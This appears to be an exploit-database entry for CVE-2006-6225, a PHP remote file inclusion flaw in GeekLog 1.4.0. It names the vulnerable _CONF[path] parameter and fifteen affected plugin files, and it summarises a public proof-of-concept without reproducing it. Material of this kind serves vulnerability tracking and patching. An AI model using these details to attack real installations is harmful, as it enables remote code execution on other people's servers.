Exploitation Summary
EIP tracks 1 public exploit for CVE-2006-6225. PoCs published by Kw3[R]Ln.
AI-analyzed exploit summary This is a writeup describing a remote file inclusion vulnerability in GeekLog <= 1.4.0 due to unsanitized $_CONF[path] variable when register_globals is enabled. It provides multiple exploit URLs but no actual exploit code.
Description
Multiple PHP remote file inclusion vulnerabilities in GeekLog 1.4 allow remote attackers to execute arbitrary code via a URL in the _CONF[path] parameter to (1) links/functions.inc, (2) polls/functions.inc, (3) spamx/BlackList.Examine.class.php, (4) spamx/DeleteComment.Action.class.php, (5) spamx/EditIPofURL.Admin.class.php, (6) spamx/MTBlackList.Examine.class.php, (7) spamx/MassDelete.Admin.class.php, (8) spamx/MailAdmin.Action.class.php, (9) spamx/MassDelTrackback.Admin.class.php, (10) spamx/EditHeader.Admin.class.php, (11) spamx/EditIP.Admin.class.php, (12) spamx/IPofUrl.Examine.class.php, (13) spamx/Import.Admin.class.php, (14) spamx/LogView.Admin.class.php, and (15) staticpages/functions.inc, in the plugins/ directory.
Exploits (1)
This is a writeup describing a remote file inclusion vulnerability in GeekLog <= 1.4.0 due to unsanitized $_CONF[path] variable when register_globals is enabled. It provides multiple exploit URLs but no actual exploit code.